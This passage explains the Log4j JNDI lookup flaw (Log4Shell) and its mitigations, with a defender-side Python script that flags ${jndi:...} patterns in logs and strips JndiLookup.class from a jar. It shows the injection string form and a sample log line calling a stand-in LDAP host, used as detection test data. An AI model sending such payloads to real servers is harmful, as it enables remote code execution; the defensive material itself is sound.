${jndi:ldap://<remote url>}
(where remote url is the hacker's server).

When Log4j executes the log statement, the server performs a JNDI lookup against that remote URL. The remote server responds with a reference to another Java class file (e.g. http://<remote url>/XYZ.class), which is then loaded into the server process. The injected Java class executes inside the JVM and allows the hacker to execute arbitrary code on the server.

Mitigation: set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
Or remove the JndiLookup class from the classpath:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

or substitute an empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's classloading documentation to understand this behavior.
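The following is an added example (not code from the original page or from the Log4j project) covering both passages above: it flags log or request lines that carry Log4j lookup syntax such as ${jndi:...}, so the attack input described at the top can be alerted on, and it checks a log4j-core jar for JndiLookup.class and writes a copy without that entry, which is what the zip -q -d command above does. The sample log lines, the stand-in jar (placeholder bytes, not the real class) and all function names are constructed for this example.

```python
"""Defender-side checks for the Log4j JNDI lookup issue.

1. find_lookup_patterns(lines): flag lines containing Log4j lookup syntax.
2. jndi_lookup_status(jar) / strip_jndi_lookup(jar, out): report whether a
   log4j-core jar still ships JndiLookup.class and produce a copy without it.
"""
import os
import re
import tempfile
import zipfile

# Path of the class inside log4j-core-*.jar that the zip -q -d command removes.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Log4j lookup syntax is "${<prefix>:<value>}". The pattern is deliberately broad:
# any "${...:...}" in untrusted input deserves a look, not only the "jndi" prefix,
# but a colon is required so that plain "${name}" text does not create noise.
LOOKUP_RE = re.compile(r"\$\{[^}]*:[^}]*\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_lookup_patterns(lines):
    """Return (line_number, matched_text, is_jndi) for every lookup found."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for m in LOOKUP_RE.finditer(line):
            hits.append((n, m.group(0), bool(JNDI_RE.search(m.group(0)))))
    return hits


# Constructed sample access-log lines (not taken from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://remote.example/a}"',
    '10.0.0.7 - - "GET /price?tag=${sale} HTTP/1.1" 200 "curl/7.79"',
]


def jndi_lookup_status(jar_path):
    """True if the jar still contains JndiLookup.class."""
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_LOOKUP_ENTRY in zf.namelist()


def strip_jndi_lookup(jar_path, out_path):
    """Copy jar_path to out_path without JndiLookup.class; return entries removed."""
    removed = 0
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(out_path, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_ENTRY:
                removed += 1
                continue
            # Re-use the original ZipInfo so timestamps and compression are kept.
            dst.writestr(info, src.read(info.filename))
    return removed


def build_sample_jar(path):
    """Write a stand-in 'log4j-core' jar; the class entries are placeholder bytes."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"placeholder")
        zf.writestr(JNDI_LOOKUP_ENTRY, b"placeholder")


def demo_jar_roundtrip():
    """Build the sample jar, strip it, and return (had_class, removed, has_class_after)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "log4j-core-sample.jar")
        dst = os.path.join(tmp, "log4j-core-sample.stripped.jar")
        build_sample_jar(src)
        before = jndi_lookup_status(src)
        removed = strip_jndi_lookup(src, dst)
        after = jndi_lookup_status(dst)
        return before, removed, after


if __name__ == "__main__":
    for n, text, is_jndi in find_lookup_patterns(SAMPLE_LOG):
        print(f"line {n}: {text!r} jndi={is_jndi}")
    print("jar before/removed/after:", demo_jar_roundtrip())
```

The log check is a detection aid for a WAF or SIEM, not a fix: the server-side remedy is still to upgrade log4j-core or remove the class as described above. Note also that LOG4J_FORMAT_MSG_NO_LOOKUPS only has an effect on Log4j 2.10 and later and was later found to be an incomplete mitigation, so prefer the upgrade or class removal.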